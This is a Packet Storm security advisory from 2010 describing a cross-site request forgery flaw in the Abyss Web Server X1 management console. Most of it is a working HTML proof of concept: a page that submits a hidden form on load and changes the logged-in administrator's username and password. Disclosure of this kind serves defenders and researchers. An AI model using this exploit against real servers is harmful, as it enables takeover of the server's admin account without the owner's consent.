Abyss Web Server X1 Cross Site Request Forgery

2010-05-14T00:00:00
ID PACKETSTORM:89528
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-14T00:00:00

Description

                                        
                                            `<!--=========================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Cross-site Request Forgery #  
# Software.................Abyss Web Server X1 #  
# Download.................http://www.aprelium.com/abyssws/download.php #  
# Date.....................5/13/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# A cross-site request forgery vunlerability in the Abyss Web Server X1 management console can be exploited #  
# to change both the username and password of the logged in user. #  
# #  
# #  
# ##Proof of Concept## -->  
<html>  
<body onload="document.forms[0].submit()">  
<form method="post" action="http://localhost:9999/console/credentials">  
<input type="hidden" name="/console/credentials/login" value="new_username" />   
<input type="hidden" name="/console/credentials/password/$pass1" value="new_password" />   
<input type="hidden" name="/console/credentials/password/$pass2" value="new_password" />   
<input type="hidden" name="/console/credentials/bok" value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />   
</form>   
</body>  
</html>  
`